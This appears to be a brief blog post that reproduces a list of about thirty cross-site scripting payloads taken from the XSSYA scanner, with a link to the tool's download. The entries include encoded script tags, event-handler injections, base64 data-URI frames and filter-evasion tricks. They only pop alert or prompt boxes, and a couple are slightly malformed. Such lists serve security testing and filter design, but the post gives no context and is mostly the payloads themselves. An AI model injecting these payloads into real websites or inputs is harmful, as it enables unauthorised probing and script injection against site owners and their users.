xss payload

1. 代码来自xssya.py
http://packetstorm.interhost.co.il/UNIX/scanners/XSSYA-master.zip

"%22%3Cscript%3Ealert%28%27XSSYA%27%29%3C%2Fscript%3E",
              "1%253CScRiPt%2520%253Eprompt%28962477%29%253C%2fsCripT%253E",
                "<script>alert('xssya')</script>",
                "'';!--\"<XSS>=&{()}",
                "%3CScRipt%3EALeRt(%27xssya%27)%3B%3C%2FsCRipT%3E"
                "<scr<script>ipt>alert(1)</scr<script>ipt>",
                "%3cscript%3ealert(%27XSSYA%27)%3c%2fscript%3e",
                "%3cbody%2fonhashchange%3dalert(1)%3e%3ca+href%3d%23%3eclickit",
                "%3cimg+src%3dx+onerror%3dprompt(1)%3b%3e%0d%0a",
                "%3cvideo+src%3dx+onerror%3dprompt(1)%3b%3e",
                "<iframesrc=\"javascript:alert(2)\">",
                "<iframe/src=\"data:text&sol;html;&Tab;base64&NewLine;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==\">",
                "<form action=\"Javascript:alert(1)\"><input type=submit>",
                "<isindex action=data:text/html, type=image>",
                "<object data=\"data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=\">",
                "<svg/onload=prompt(1);>",
                "<marquee/onstart=confirm(2)>/",
                "<body onload=prompt(1);>",
                "<q/oncut=open()>",
                "<a onmouseover=location=’javascript:alert(1)>click",
                "<svg><script>alert&#40/1/&#41</script>",
                "&lt;/script&gt;&lt;script&gt;alert(1)&lt;/script&gt;",
                "<scri%00pt>alert(1);</scri%00pt>",
                "<scri%00pt>confirm(0);</scri%00pt>",
                "5\x72\x74\x28\x30\x29\x3B'>rhainfosec",
                "<isindex action=j&Tab;a&Tab;vas&Tab;c&Tab;r&Tab;ipt:alert(1) type=image>",
                "<marquee/onstart=confirm(2)>",
                "<A HREF=\"http://www.google.com./\">XSS</A>",
                "<svg/onload=prompt(1);>"

你可能感兴趣的:(load)